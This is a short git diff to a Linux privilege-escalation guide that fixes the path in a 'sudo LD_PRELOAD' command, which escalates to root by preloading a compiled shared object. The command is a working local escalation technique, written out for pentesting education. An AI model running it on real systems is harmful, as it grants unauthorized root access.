diff --git a/linux-hardening/privilege-escalation/README.md b/linux-hardening/privilege-escalation/README.md index f663bb7e6..9cec3b1d0 100644 --- a/linux-hardening/privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/README.md @@ -954,7 +954,7 @@ gcc -fPIC -shared -o pe.so pe.c -nostartfiles Finally, **escalate privileges** running ```bash -sudo LD_PRELOAD=pe.so #Use any command you can run with sudo +sudo LD_PRELOAD=./pe.so #Use any command you can run with sudo ``` {% hint style="danger" %}